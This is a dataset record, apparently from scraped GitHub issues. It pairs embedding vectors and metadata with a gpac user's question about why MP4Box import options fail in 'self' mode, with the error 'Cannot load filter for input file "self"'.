-0.008637316524982452, -0.007388292346149683, 0.011234155856072903, 0.008729052729904652, 0.01720406673848629, -0.00546888867393136, -0.014663678593933582, -0.04668666794896126, -0.009095996618270874, 0.01905290223658085, -0.01997026428580284, 0.00323370099067688, 0.015058849938213825, -0.017909729853272438, -0.01384510938078165, 0.0025068679824471474, 0.009858112782239914, 0.02348446659743786, 0.0032901540398597717, 0.015087076462805271, 0.017669804394245148, 0.005123113747686148, 0.02526273764669895, -0.007917540147900581, 0.01929282769560814, -0.007931653410196304, -0.013266465626657009, 0.017571011558175087, -0.00014907131844665855, 0.004734999034553766, 0.008587920106947422, 0.0038564486894756556, -0.006693214178085327, 0.004675017669796944, 0.014621338807046413, -0.03466217219829559, 0.026674063876271248, 0.004166940692812204, 0.010112151503562927, -0.013499334454536438, -0.024373602122068405, -0.00003180997009621933, 0.007529424969106913, 0.007127196993678808, 0.03988407552242279, -0.02005494385957718, -0.000019819208318949677, -0.0019441017648205161, 0.020661814138293266, -0.01317472942173481, -0.00805161613970995, 0.0039199586026370525, 0.0332508459687233, 0.026659950613975525, -0.0026074249763041735, 0.011735176667571068, -0.0003442312590777874, 0.010323850437998772, -0.010422643274068832, 0.00862320326268673, 0.00021599905448965728, 0.016950028017163277, -0.01648429036140442, 0.016851235181093216, -0.0221578199416399, -0.011227099224925041, 0.011714006774127483, -0.014564885757863522, -0.0010373247787356377, 0.0063615525141358376, -0.0023216314148157835, -0.013774543069303036, 0.004057562910020351, 0.020224303007125854, 0.004727942403405905, 0.023738505318760872, 0.019236374646425247, 0.0152282090857625, -0.0002500693663023412, 0.005437133833765984, -0.024133676663041115, -0.014818924479186535, -0.006435647141188383, 0.015284662134945393, 0.025672022253274918, 0.003711787750944495, 0.011544647626578808, 0.015651607885956764, -0.004350413102656603, -0.018234333023428917, 0.005130170378834009, -0.01682300865650177, 0.006509741768240929, -0.012236197479069233, -0.012490236200392246, -0.003171955468133092, 0.039093732833862305, -0.014677791856229305, 0.0014801282668486238, -0.004159884061664343, 0.007769350428134203, -0.0285511277616024, 0.009618187323212624, -0.018742410466074944, -0.0012066838098689914, -0.007635274436324835, -0.011276495642960072, -0.014804811216890812, 0.013739259913563728, -0.009328865446150303, 0.004787923768162727, -0.011643440462648869, -0.016879461705684662, -0.03782353922724724, -0.02616598643362522, -0.010500266216695309, 0.021409817039966583, 0.02354091964662075, 0.00015304067346733063, -0.01098717376589775, -0.004851433448493481, 0.0010267398320138454, -0.021790875121951103, 0.00891252513974905, -0.02019607648253441, 0.02448650822043419, 0.00033386683207936585, 0.017895616590976715, -0.02396431751549244, 0.0010382068576291203, 0.025982514023780823, -0.009138336405158043, 0.003076690947636962, -0.012045668438076973, 0.008905468508601189, 0.005592379719018936, 0.0051125288009643555, -0.024754660204052925, -0.004964339546859264, -0.025883721187710762, 0.011960988864302635, -0.01587742008268833, -0.0027979540172964334, 0.0014042694820091128, 0.007712897378951311, 0.0001625230215722695, -0.014550772495567799, -0.01379571296274662, -0.028381768614053726, -0.019956151023507118, 0.002314574783667922, 0.0039199586026370525, -0.021480383351445198, 0.010394416749477386, 0.012977143749594688, -0.0063086277805268764, -0.015284662134945393, -0.013090049847960472, 0.005677059292793274, -0.008157465606927872, -0.001997026614844799, -0.009815772995352745, 0.01274427492171526, -0.008940751664340496, 0.004106959328055382, 0.015623380430042744, 0.000991456676274538, 0.004466847516596317, 0.00108407496009022, -0.03339197859168053, -0.031613707542419434, -0.003644749755039811, 0.009992188774049282, 0.015327001921832561, 0.021804988384246826, -0.01624436490237713, 0.011015400290489197, -0.01596209965646267, -0.0032037103082984686, 0.008665543049573898, -0.014945943839848042, -0.015693947672843933, 0.034238774329423904, 0.0038035239558666945, 0.001171400654129684, 0.024190129712224007, 0.029045091941952705, -0.0016327279154211283, -0.0195750929415226, 0.005775852128863335, -0.035000890493392944, 0.008016332983970642, 0.01484715100377798, -0.013040653429925442, -0.014007411897182465, 0.004523300565779209, -0.0006328915478661656, -0.00460797967389226, 0.0161032322794199, 0.004671489354223013, 0.008849015459418297, -0.007098970469087362, -0.011622270569205284, -0.002423952566459775, -0.030145926401019096, 0.01503062341362238, 0.03593236580491066, -0.006029890850186348, -0.011100079864263535, 0.02095819264650345, 0.015072963200509548, 0.007056630682200193, -0.0013751608785241842, 0.0051795667968690395, 0.010387360118329525, 0.022708237171173096, 0.005200736690312624, 0.007116612046957016, -0.005839361809194088, -0.021861441433429718, -0.0021857914980500937, 0.013210012577474117, -0.00010254166409140453, 0.01910935528576374, 0.0011669902596622705, 0.015947986394166946, 0.004749112296849489, 0.004858490079641342, -0.016879461705684662, -0.022665897384285927, 0.00003145162554574199, 0.011452911421656609, 0.022665897384285927, 0.008679656311869621, -0.00011919090320589021, -0.011678723618388176, 0.008143352344632149, -0.0017279924359172583, 0.023837298154830933, 0.004163412377238274, -0.016427837312221527, -0.0053842091001570225, 0.027563199400901794, 0.018220219761133194, 0.013682806864380836, 0.010196831077337265, -0.028791053220629692, 0.001131707220338285, 0.015708060935139656, -0.028043050318956375, -0.003376597771421075, -0.008714939467608929, 0.001019683200865984, -0.006827290169894695, 0.00651679839938879, 0.0003182099317200482, -0.019899697974324226, -0.02073238044977188, -0.00810101255774498, 0.0077340672723948956, 0.030004793778061867, 0.004233978688716888, -0.0019811491947621107, -0.0001424557267455384, -0.015792740508913994, -0.01083898451179266, -0.02620832622051239, 0.0037647124845534563, -0.03025883249938488, 0.0134146548807621, 0.019546866416931152, -0.02901686541736126, -0.025756701827049255, 0.0011511128395795822, 0.0010152728063985705, 0.0058464184403419495, 0.009152449667453766, 0.0016291995998471975, -0.02344212681055069, -0.00108407496009022, -0.009851056151092052, 0.026815196499228477, -0.007388292346149683, -0.006269816309213638, 0.002681519603356719, -0.02225661277770996, 0.01026739738881588, -0.003381890244781971, 0.00017079251119866967, -0.017077047377824783, -0.0071907066740095615, -0.005415963940322399, -0.010592002421617508, -0.004646791145205498, -0.02167796902358532, -0.0032178235705941916, -0.008157465606927872, -0.02339978702366352, 0.006132212001830339, 0.014536659233272076, 0.024176016449928284, -0.012687821872532368, -0.017359312623739243, -0.010973060503602028, 0.026504704728722572, -0.02649059146642685, 0.0040152231231331825, -0.012716048397123814, 0.016470177099108696, 0.0012534339912235737, 0.005380680784583092, -0.02901686541736126, 0.0115093644708395, -0.010119208134710789, 0.017853276804089546, 0.015439908020198345, 0.013711033388972282, 0.006936667952686548, -0.012708991765975952, 0.013308805413544178, -0.003191361203789711, -0.015312888659536839, 0.012490236200392246, 0.02963784895837307, 0.0019035261357203126, 0.011198872700333595, 0.00561002129688859, -0.014903604052960873, -0.022228386253118515, 0.017316972836852074, 0.006502685137093067, 0.0077622937969863415, -0.014706018380820751, 0.006982536055147648, 0.004837320186197758, -0.022792916744947433, -0.016456063836812973, -0.009293582290410995, -0.016032665967941284, -0.01369692012667656, 0.025897834450006485, 0.019998490810394287, 0.03130321577191353, -0.006340382620692253, 0.012878350913524628, 0.01503062341362238, 0.003358956193551421, 0.030033020302653313, -0.0022087255492806435, -0.001571864471770823, 0.009103053249418736, 0.005377152469009161, 0.005648832768201828, -0.020887626335024834, -0.045105982571840286, 0.015199982561171055, -0.004512715619057417, 0.013456994667649269, -0.01412737462669611, -0.005821720231324434, -0.0021381592378020287, -0.0012084479676559567, -0.004971396178007126, 0.006305099464952946, -0.01464956533163786, -0.015016510151326656, 0.005391265731304884, 0.00815040897578001, 0.007070743944495916, 0.007522368337959051, -0.005296001210808754, 0.02558734267950058, -0.01450843270868063, -0.02564379572868347, 0.005662946030497551, 0.00921595934778452, 0.01762746460735798, 0.00004214682849124074, -0.016216138377785683, 0.0026656421832740307, -0.02139570377767086, 0.01710527390241623, -0.0014183827443048358, 0.012617255561053753, -0.008192748762667179, -0.009441771544516087, 0.014049751684069633, -0.013393484987318516, -0.01365458033978939, -0.011537590995430946, 0.00684846006333828, 0.0013495805906131864, -0.019546866416931152, -0.006820233538746834, 0.0195750929415226, 0.017331086099147797, -0.003994053229689598, 0.015044736675918102, 0.0032989748287945986, 0.00979460310190916, 0.004974924493581057, 0.029807208105921745, -0.007508255075663328, 0.0014510196633636951, -0.01692180149257183, 0.0001529304136056453, -0.0015418737893924117, -0.012137404642999172, 0.02526273764669895, 0.013950958847999573, 0.02921445108950138, -0.03830339014530182, -0.010528492741286755, 0.0036094665993005037, 0.009780489839613438, 0.026504704728722572, -0.007303612772375345, 0.011643440462648869, -0.011586987413465977, 0.004085789434611797, -0.0016133221797645092, -0.00038833520375192165, -0.00003470429146545939, 0.02105698548257351, -0.02067592740058899, 0.00016924887313507497, -0.015327001921832561, -0.00419516721740365, -0.0019088186090812087, -0.014063864946365356, 0.005052547436207533, -0.01184102613478899, 0.01136117521673441, -0.034436360001564026, 0.00824214518070221, 0.007353009190410376, -0.0009455885156057775, -0.019942037761211395, -0.003538900287821889, 0.005426548887044191, 0.01824844628572464, -0.025276850908994675, -0.008503240533173084, -0.0322064645588398, -0.015595153905451298, 0.01768391765654087, 0.008235088549554348, 0.002896746853366494, -0.011276495642960072, -0.018657730892300606, -0.007882256992161274, 0.012476122938096523, -0.00443156436085701, -0.0017967945896089077, 0.0008829609141685069, -0.010930720716714859, -0.018855316564440727, -0.008143352344632149, -0.0061851367354393005, -0.02921445108950138, 0.02416190318763256, -0.009060713462531567, -0.019179921597242355, -0.00499256607145071, 0.0000866642440087162, -0.004854961764067411, 0.004054034594446421, -0.0025209812447428703, -0.002480405615642667, 0.018191993236541748, 0.02392197772860527, -0.0016768318600952625, 0.0011414099717512727, 0.005881701596081257, -0.008030446246266365, 0.0035477210767567158, -0.008637316524982452, -0.00027145977946929634, 0.013661636970937252, -0.003701202804222703, -0.015566927380859852, -0.000017545100490679033, -0.0037647124845534563, 0.006273344624787569, 0.0009041308076120913, 0.010359133593738079, 0.014903604052960873, -0.006862573325634003, -0.00959701742976904, 0.0008723759674467146, 0.0134146548807621, 0.008933695033192635, -0.013979185372591019, -0.005059604067355394, 0.0006633232696913183, -0.002309282310307026, -0.005027849227190018, -0.011064796708524227, 0.008891355246305466, 0.01943396031856537, 0.017232293263077736, -0.002173442393541336, -0.008573806844651699, -0.014903604052960873, -0.02663172408938408, 0.006590893026441336, -0.0022140180226415396, -0.01577862724661827, -0.0034700981341302395, 0.0035036171320825815, 0.027436180040240288, -0.0008018096559680998, -0.01117064617574215, -0.007769350428134203, 0.005359510891139507, -0.006530911661684513, -0.025714362040162086, 0.00503843417391181, -0.0012931275414302945, -0.0006059881416149437, 0.02601074054837227, 0.0030220020562410355, 0.0011837497586384416, 0.014903604052960873, 0.031839519739151, 0.015566927380859852, -0.018304899334907532, 0.011516421101987362, -0.00014499170356430113, 0.013711033388972282, 0.00025205404381267726, -0.0022845841012895107, -0.0062310048379004, -0.025883721187710762, -0.00023176621471066028, -0.01484715100377798, -0.011784573085606098, 0.015764513984322548, -0.009159506298601627, 0.011516421101987362, 0.010740191675722599, 0.03231937065720558, 0.015482247807085514, -0.009540564380586147, 0.0013187078293412924, 0.018361352384090424, 0.01360518392175436, 0.0011625798651948571, 0.03426700085401535, 0.0001224987063324079, 0.006700270809233189, 0.010704908519983292, -0.002030545612797141, 0.010584945790469646, 0.01251140609383583, 0.01586330682039261, 0.004360998049378395, -0.009039544500410557, 0.001591270207427442, -0.0036906178575009108, 0.0167806688696146, 0.01563749462366104, 0.015764513984322548, -0.009138336405158043, -0.024387715384364128, -0.013386428356170654, -0.00433629984036088, -0.0044633192010223866, -0.005359510891139507, 0.008475014008581638, 0.0031648988369852304, 0.010521436110138893, -0.007197763305157423, 0.013301748782396317, 0.010535549372434616, -0.030964495614171028, 0.0018947053467854857, 0.004879659973084927, 0.009773433208465576, -0.005962852854281664, 0.012546689249575138, -0.003533607814460993, 0.004343356471508741, 0.02969430200755596, 0.024613527581095695, -0.009716980159282684, 0.008573806844651699, -0.006269816309213638, 0.002319867257028818, 0.00460797967389226, -0.004135185852646828, -0.017980296164751053, -0.0073671224527060986, 0.011968045495450497, -0.02620832622051239, -0.011022456921637058, -0.006001664325594902, -0.0057370406575500965, -0.007024875842034817, -0.016173798590898514, -0.0016353741521015763, 0.0006558255990967155, -0.0008445904823020101, 0.022524764761328697, -0.0075576514936983585, 0.004304545000195503, -0.008220975287258625, 0.007628217805176973, -0.01730285957455635, -0.011798686347901821, -0.02049245499074459, -0.014310847036540508, 0.002254593651741743, -0.0005790847353637218, -0.01630081795156002, -0.011375288479030132, 0.01862950436770916, -0.008573806844651699, -0.008446787483990192, -0.0018947053467854857, -0.017133500427007675, 0.016371384263038635, 0.0005526224267669022, 0.012927747331559658, -0.016752442345023155, -0.0027979540172964334, -0.0013654580106958747, -0.01069785188883543, 0.006428590510040522, -0.01141057163476944, -0.005899343173950911, -0.025756701827049255, 0.01026739738881588, 0.004823206923902035, 0.026236552745103836, -0.02253887802362442, 0.010500266216695309, 0.023230427876114845, -0.006693214178085327, -0.026095420122146606, -0.016286704689264297, -0.00465737609192729, 0.015058849938213825, 0.0056276628747582436, 0.017175840213894844, 0.00551475677639246, 0.006717912387102842, 0.025036925449967384, -0.0022651783656328917, -0.029270904138684273, 0.009851056151092052, -0.0043010166846215725, -0.010168604552745819, -0.01682300865650177, -0.006365080829709768, -0.0071095554158091545, -0.009067770093679428, -0.0025933117140084505, 0.0023833769373595715, 0.007222461514174938, 0.003392475191503763, 0.021226344630122185, -0.022524764761328697, -0.0029690773226320744, 0.007268329616636038, -0.0064709302969276905, 0.001159933628514409, 0.008976034820079803, 0.008079842664301395, -0.011085966601967812, -0.008249201811850071, -0.003406588453799486, 0.010083924978971481, 0.01606089249253273, -0.001041735173203051, -0.014960057102143764, 0.030484644696116447, -0.00917361956089735, 0.015397568233311176, 0.0223412923514843, 0.004339828155934811, 0.024599414318799973, 0.028085390105843544, -0.022284839302301407, -0.007487085182219744, -0.009399431757628918, 0.0015418737893924117, 0.004819678608328104, -0.0036941461730748415, -0.006904913112521172, -0.011579930782318115, -0.008545580320060253, 0.004869075026363134, 0.008594976738095284, -0.031472574919462204, -0.0012084479676559567, -0.012278537265956402, -0.0016212608898058534, -0.017909729853272438, 0.00484790513291955, -0.005475945305079222, 0.004667961038649082, -0.0016538978088647127, -0.03912195935845375, 0.005606492981314659, 0.011332948692142963, 0.0045691682025790215, -0.0015992089174687862, -0.0152282090857625, 0.00018689045100472867, -0.02486756630241871, -0.00979460310190916, 0.004103431012481451, -0.006679100915789604, -0.02101464569568634, 0.0014863028191030025, 0.0071836500428617, -0.0020217248238623142, -0.007727010641247034, 0.006929611321538687, 0.01002747192978859, -0.002914388431236148, 0.010352076962590218, 0.0005733512225560844, 0.004061091225594282, -0.012878350913524628, -0.0030220020562410355, 0.0001305476762354374, 0.019137581810355186, 0.016808895394206047, -0.013915675692260265, -0.019518639892339706, -0.0007881374331191182, 0.01730285957455635, -0.0005248369416221976, 0.013181786052882671, 0.01682300865650177, -0.02526273764669895, -0.03440813347697258, 0.0020181965082883835, -0.0059946076944470406, 0.005236019846051931, -0.018220219761133194, 0.020802946761250496, 0.004551526624709368, -0.013111219741404057, 0.007663500960916281, -0.005952267907559872, -0.013012426905333996, -0.0039340718649327755, 0.021621515974402428, 0.00035988815943710506, -0.004078732803463936, 0.002224602969363332, 0.0116011006757617, 0.019222261384129524, -0.0035653626546263695, -0.005835833493620157, 0.02444416843354702, -0.002409839304164052, -0.01838957890868187, 0.011184759438037872, -0.02829708904027939, 0.022524764761328697, -0.01212329138070345, 0.006044004112482071, 0.008820788934826851, -0.006163966841995716, -0.013358201831579208, -0.00926535576581955, 0.009103053249418736, 0.008834902197122574, -0.0013098870404064655, 0.0026691704988479614, -0.0008983972948044538, 0.037851765751838684, -0.0066332328133285046, 0.02520628459751606, 0.01706293411552906, 0.01484715100377798, 0.00742357550188899, 0.007173065096139908, 0.0007405051728710532, 0.012236197479069233, -0.011417628265917301, 0.0017050583846867085, 0.01450843270868063, 0.005567681510001421, -0.0028826335910707712, 0.00489730155095458, -0.0012428490445017815, 0.02077472023665905, -0.012476122938096523, 0.004600923042744398, -0.0053030578419566154, 0.003658863017335534, -0.008587920106947422, -0.01093777734786272, -0.015708060935139656, -0.008157465606927872, -0.015750400722026825, 0.014536659233272076, 0.004198695532977581, -0.00732478266581893, -0.001972328405827284, 0.017048820853233337, -0.0016291995998471975, -0.023329220712184906, -0.011304722167551517, -0.00025293612270615995, -0.023018728941679, 0.004251620266586542, 0.0016547798877581954, 0.0009641121723689139, 0.00461150798946619, 0.008460900746285915, 0.007240103092044592, -0.011467024683952332, 0.004749112296849489, 0.0036694479640573263, 0.004544469993561506, -0.023809071630239487, -0.005292472895234823, 0.01776859723031521, -0.004643262829631567, -0.013816882856190205, 0.00004385585634736344, -0.003849392058327794, -0.0005530634662136436, 0.002258121967315674, -0.005490058567374945, 0.00009895821858663112, -0.010683738626539707, 0.023851411417126656, 0.004322186578065157, -0.006005192641168833, 0.0012463773600757122, 0.02853701449930668, -0.02434537559747696, 0.01587742008268833, 0.0032407576218247414, 0.011424684897065163, -0.008037502877414227, -0.016808895394206047, 0.00017476186621934175, -0.008425617590546608, -0.005782908760011196, -0.00810101255774498, -0.009611130692064762, -0.015905646607279778, 0.000374001421732828, 0.019335167482495308, 0.00896192155778408, 0.009427658282220364, 0.0017041763057932258, -0.021282797679305077, 0.009526451118290424, 0.017669804394245148, 0.007529424969106913, 0.006100457161664963, 0.0059275696985423565, -0.010930720716714859, 0.0064850435592234135, -0.0012543160701170564, -0.004759697243571281, -0.005045490805059671, -0.005165453534573317, -0.002939086640253663, -0.012045668438076973, -0.008460900746285915, -0.0031543138902634382, -0.025178058072924614, -0.0006073112599551678, 0.010930720716714859, 0.014593112282454967, -0.0026515289209783077, 0.020224303007125854, 0.0010240935953333974, 0.022552991285920143, -0.019264601171016693, -0.025883721187710762, 0.008566750213503838, -0.01624436490237713, 0.010831927880644798, -0.015016510151326656, 0.003634164808318019, -0.01587742008268833, 0.00805161613970995, 0.001305476645939052, 0.015072963200509548, 0.012779558077454567, -0.01213034801185131, 0.012342046946287155, 0.030230605974793434, 0.031613707542419434, -0.008827845565974712, -0.004198695532977581, 0.010387360118329525, 0.0046503194607794285, -0.010295623913407326, -0.008086899295449257, -0.012539632618427277, -0.012334990315139294, 0.022792916744947433, -0.015214095823466778, 0.004639734514057636, -0.0025827267672866583, 0.003471862291917205, -0.013534617610275745, 0.03483153134584427, -0.0044633192010223866, -0.004904358182102442, 0.0003129174583591521, 0.01145996805280447, 0.0060228342190384865, -0.013456994667649269, -0.021804988384246826, -0.008700826205313206, -0.005786437075585127, 0.0167806688696146, 0.009963962249457836, 0.003676504595205188, 0.043864015489816666, 0.02097230590879917, -0.0037788257468491793, -0.0015401096316054463, 0.01379571296274662, 0.02310340851545334, 0.017641577869653702, 0.023131635040044785, -0.006506213452666998, -0.012419669888913631, 0.02029486931860447, 0.004068147856742144, 0.004780867137014866, 0.011107136495411396, 0.011093023233115673, 0.0030925683677196503, -0.005045490805059671, 0.014233224093914032, -0.005631191190332174, 0.0006897856364957988, -0.007698784116655588, 0.0042198654264211655, 0.019222261384129524, 0.0008551754290238023, 0.00565941771492362, -0.00016164094267878681, 0.024712320417165756, 0.020125510171055794, 0.0077622937969863415, -0.01768391765654087, -0.026885762810707092, 0.01165049709379673, 0.012786614708602428, -0.03254518285393715, 0.012920690700411797, 0.0075576514936983585, 0.005359510891139507, 0.0007797576836310327, 0.008326824754476547, -0.001328410697169602, -0.001005569938570261, -0.006559138186275959, 0.009258299134671688, 0.007416518870741129, 0.004886716604232788, -0.024952245876193047, 0.007053102366626263, 0.010641398839652538, -0.022073140367865562, -0.004625621251761913, 0.027436180040240288, 0.002482169773429632, -0.003553013550117612, -0.0211134385317564, -0.01074724830687046, -0.014388469979166985, -0.004184582270681858, 0.028466448187828064, -0.005969909485429525, -0.00405050627887249, -0.0075717647559940815, -0.005292472895234823, -0.02115577831864357, -0.0052889445796608925, 0.0025315661914646626, 0.0005614432157017291, 0.010429699905216694, -0.016512516885995865, 0.01668187603354454, 0.017119387164711952, 0.021748535335063934, 0.016611309722065926, -0.001131707220338285, -0.0096040740609169, 0.009251242503523827, -0.03463394567370415, 0.015976212918758392, 0.0018082616152241826, 0.007952823303639889, -0.01317472942173481, 0.007988106459379196, -0.006125155370682478, 0.008270371705293655, -0.0161032322794199, 0.001776506775058806, 0.023173974826931953, -0.009103053249418736, 0.004092846065759659, 0.005126642063260078, 0.00027829589089378715, 0.002656821394339204, 0.02049245499074459, 0.003149021416902542, -0.0014227931387722492, -0.01829078607261181, 0.017133500427007675, 0.0015004160813987255, 0.017895616590976715, 0.005165453534573317, 0.005271303001791239, -0.0013566372217610478, -0.0032760407775640488, 0.0017324028303846717, -0.010140378028154373, -0.0034453999251127243, 0.01007686834782362, 0.035819459706544876, -0.01943396031856537, -0.023992544040083885, 0.009152449667453766, -0.00028557301266118884, 0.01265253871679306, -0.012991257011890411, -0.014804811216890812, -0.00732478266581893, -0.02448650822043419, 0.023046955466270447, -0.017613351345062256, -0.009484111331403255, -0.014212054200470448, -0.009159506298601627, 0.0030414077918976545, 0.009611130692064762, -0.021508609876036644, -0.0016609544400125742, 0.018925882875919342, -0.009815772995352745, 0.017189953476190567, -0.01236321683973074, 0.03398473560810089, -0.017232293263077736, -0.015595153905451298, 0.01222208421677351, 0.014917717315256596, 0.0002873371704481542, 0.017698030918836594, 0.0008190101943910122, -0.005415963940322399, -0.010641398839652538, -0.010909550823271275, 0.01634315773844719, 0.00275737838819623, -0.010133321397006512, -0.005902871489524841, -0.04064619168639183, -0.01563749462366104, -0.005250133108347654, 0.008086899295449257, -0.005782908760011196, 0.017698030918836594, -0.005842890124768019, 0.0007757883286103606, -0.010606115683913231, -0.011304722167551517, 0.0046220929361879826, 0.017952069640159607, -0.008256258442997932, 0.00008269488898804411, 0.0012349103344604373, -0.0152282090857625, -0.008538523688912392, 0.048436712473630905, 0.019617432728409767, 0.017260519787669182, -0.018939996138215065, -0.008284484967589378, 0.004696187563240528, 0.004618564620614052, -0.013513447716832161, -0.001361929695121944, 0.0015806852607056499, -0.004297488369047642, -0.018220219761133194, 0.019843244925141335, -0.011579930782318115, -0.011248269118368626, 0.013287635520100594, 0.017669804394245148, -0.013739259913563728, -0.013732203282415867, -0.018855316564440727, -0.0023022256791591644, -0.009829886257648468, 0.0031543138902634382, -0.02678696997463703, 0.0040963743813335896, 0.011311778798699379, 0.007268329616636038, -0.039573583751916885, -0.00795987993478775, -0.01963154599070549, 0.012998313643038273, -0.01488949079066515, 0.0030978608410805464, 0.014014468528330326, -0.002981426427140832, -0.01260314229875803, 0.008171578869223595, 0.022087253630161285, -0.02773255854845047, -0.005257189739495516, -0.011452911421656609, -0.005186623428016901, -0.006594421342015266, 0.0008613499812781811, -0.03435168042778969, 0.008065729402005672, -0.018220219761133194, 0.03621463105082512, 0.01212329138070345, 0.025432096794247627, -0.0050172642804682255, 0.003905845107510686, -0.006273344624787569, 0.012765444815158844, 0.027224481105804443, 0.0033077956177294254, 0.007003705948591232, -0.0010549663566052914, -0.012899520806968212, -0.004022279754281044, 0.012066838331520557, -0.0026374156586825848, -0.012708991765975952, 0.002977898111566901, -0.016272591426968575, -0.0052607180550694466, 0.03672270476818085, -0.01093777734786272, -0.008284484967589378, 0.04183170571923256, -0.012469066306948662, 0.005835833493620157, -0.0017359311459586024, -0.02472643367946148, -0.013012426905333996, -0.02640591189265251, -0.006107513792812824, -0.013407598249614239, 0.025135718286037445, -0.006502685137093067, -0.017712144181132317, -0.010203887708485126, 0.0004807329678442329, 0.00475264061242342, 0.020704153925180435, -0.00395524175837636, -0.0009499989100731909, -0.011043626815080643, 0.00786108709871769, 0.00805161613970995, 0.0192081481218338, 0.009653470478951931, -0.022510651499032974, -0.02153683640062809, 0.021212231367826462, -0.009653470478951931, 0.023809071630239487, 0.0040011098608374596, 0.005701757501810789, 0.010895437560975552, 0.01587742008268833, 0.012342046946287155, -0.011946875602006912, -0.008714939467608929, 0.01740165241062641, -0.01662542298436165, 0.013492277823388577, -0.012624312192201614, -0.02177676185965538, 0.01716172695159912, 0.008496183902025223, -0.008171578869223595, -0.02386552467942238, -0.005345397628843784, 0.010563775897026062, -0.005797022022306919, 0.0192081481218338, -0.00905365776270628, 0.010260340757668018, 0.013711033388972282, -0.028043050318956375, -0.0016177325742319226, 0.025559116154909134, -0.0008498829556629062, -0.008143352344632149, -0.0012260895455256104, -0.004777338821440935, 0.014430809766054153, 0.019716225564479828, -0.011925705708563328, -0.002513924613595009, -0.0071236686781048775, 0.01293480396270752, -0.004209280479699373, 0.02610953338444233, -0.002129338448867202, -0.0022475370205938816, 0.013922732323408127, 0.0037788257468491793, -0.005511228460818529, 0.00858086347579956, 0.024190129712224007, 0.008552636951208115, -0.013689863495528698, -0.010295623913407326, 0.0036800329107791185, -0.013111219741404057, -0.005253661423921585, -0.002034073928371072, -0.0023163389414548874, 0.005758210550993681, 0.011565817520022392, 0.018121426925063133, -0.005966381169855595, -0.003000832162797451, 0.010704908519983292, -0.0026180099230259657, 0.014804811216890812, -0.03748482093214989, 0.014974170364439487, -0.004329243209213018, 0.01949041336774826, 0.007017819210886955, -0.020026717334985733, 0.0040293363854289055, -0.003905845107510686, 0.004181053955107927, -0.003962298389524221, 0.016808895394206047, -0.003376597771421075, -0.04030747339129448, -0.006446232087910175, 0.004724414087831974, -0.0059416829608380795, -0.0002058551472146064, 0.0041387141682207584, 0.011523477733135223, 0.006601477973163128, 0.021085212007164955, 0.011114193126559258, 0.02753497287631035, 0.028409995138645172, -0.019885584712028503, 0.0038458637427538633, 0.03418232128024101, -0.004216337110847235, -0.0036906178575009108, 0.0018135540885850787, 0.005094887223094702, 0.006093400530517101, -0.007465915288776159, -0.028085390105843544, 0.004763225559145212, 0.017472218722105026, 0.00781874731183052, 0.021861441433429718, -0.007056630682200193, 0.008157465606927872, 0.003577711759135127, 0.009046601131558418, 0.015552814118564129, -0.006347439251840115, -0.002623302396386862, 0.01891176961362362 ]
null
null
null
null
null
null
null
null
null
[ "gpac", "gpac" ]
I can't use any import option in Self mode with mp4box. I've tried several options that are marked with an `S` in the [documentation](https://github.com/gpac/gpac/wiki/mp4box-import-opts) Example from the docs: `MP4Box -add self:moovts=-1:noedit src.mp4` Gives me the following: `[Importer] Cannot load filter for input file "self"` Is this faulty behavior or am I doing something wrong?
[MP4Box] Import options are not working in Self mode
https://api.github.com/repos/gpac/gpac/issues/1700/comments
5
2021-03-05T11:52:42
2021-03-05T12:53:02Z
https://github.com/gpac/gpac/issues/1700
823,014,498
1,700
false
This is a GitHub Issue repo:gpac owner:gpac Title : [MP4Box] Import options are not working in Self mode Issue date: --- start body --- I can't use any import option in Self mode with mp4box. I've tried several options that are marked with an `S` in the [documentation](https://github.com/gpac/gpac/wiki/mp4box-import-opts) Example from the docs: `MP4Box -add self:moovts=-1:noedit src.mp4` Gives me the following: `[Importer] Cannot load filter for input file "self"` Is this faulty behavior or am I doing something wrong? --- end body ---
557
[ -0.007442917674779892, 0.030988987535238266, -0.024060800671577454, 0.012631543911993504, -0.014059262350201607, -0.0019518403569236398, -0.016756897792220116, 0.04400376230478287, -0.02828383818268776, 0.016456324607133865, 0.025759031996130943, 0.04018649458885193, 0.002124669263139367, -0.029215611517429352, 0.012007856741547585, -0.0023707628715783358, -0.00009692277672002092, 0.029967043548822403, -0.04508582130074501, -0.017718728631734848, -0.014111862517893314, -0.029666470363736153, -0.02088976465165615, 0.05395270138978958, -0.02595440484583378, 0.01644129678606987, -0.04640834033489227, 0.03171036019921303, -0.010226966813206673, -0.03375425189733505, -0.002453420078381896, 0.00412535248324275, 0.016005465760827065, 0.03128955885767937, 0.038863979279994965, 0.018545301631093025, 0.02819366753101349, 0.04171941429376602, -0.04051712527871132, 0.02425617165863514, -0.04547656700015068, -0.03682008758187294, -0.027787894010543823, 0.030898816883563995, -0.03058321587741375, 0.01865050196647644, -0.04917360097169876, 0.0042192814871668816, -0.04406387731432915, 0.01148936990648508, 0.03666980192065239, -0.01704244129359722, 0.0038304163608700037, -0.038473233580589294, 0.021385708823800087, 0.0094605078920722, 0.019627360627055168, -0.028028352186083794, -0.03645940124988556, 0.025804119184613228, -0.015449408441781998, -0.005876185372471809, -0.013165059499442577, 0.005504227243363857, -0.017327984794974327, 0.01397660467773676, -0.016847068443894386, 0.007717189844697714, -0.013811290264129639, 0.02431628666818142, -0.023174112662672997, 0.01587020978331566, 0.0024440272245556116, 0.01212808582931757, 0.046648796647787094, -0.05350184068083763, 0.04403381794691086, -0.008122961968183517, -0.02792315185070038, 0.019627360627055168, -0.046678852289915085, 0.0062180859968066216, -0.013014773838222027, 0.0009956451831385493, -0.023264283314347267, -0.013225174508988857, 0.007063445169478655, -0.05671796202659607, -0.026720862835645676, -0.00988882314413786, 0.039134494960308075, -0.0035542657133191824, 0.04036683961749077, -0.020664334297180176, 0.01831987127661705, 0.029741613194346428, 0.016336096450686455, 0.006210572086274624, -0.03348373621702194, -0.0249775443226099, -0.021505936980247498, -0.042741358280181885, 0.006672701798379421, -0.024391429498791695, 0.008010247722268105, 0.0029719071462750435, 0.007536846678704023, -0.029140468686819077, 0.002665699226781726, 0.12876510620117188, -0.0011431134771555662, 0.018695587292313576, -0.01647135429084301, -0.006635129917412996, 0.008423534221947193, 0.012872002087533474, -0.02001810446381569, -0.01901118829846382, 0.001888908096589148, -0.022212281823158264, 0.008611392229795456, 0.0307335015386343, -0.01029459573328495, 0.008739135228097439, -0.04382341727614403, 0.017102554440498352, -0.039134494960308075, 0.01828981563448906, -0.011624627746641636, -0.03585825860500336, -0.012361029163002968, 0.0038191447965800762, 0.0028479211032390594, -0.001257706549949944, -0.039284780621528625, 0.013766204006969929, -0.025608746334910393, 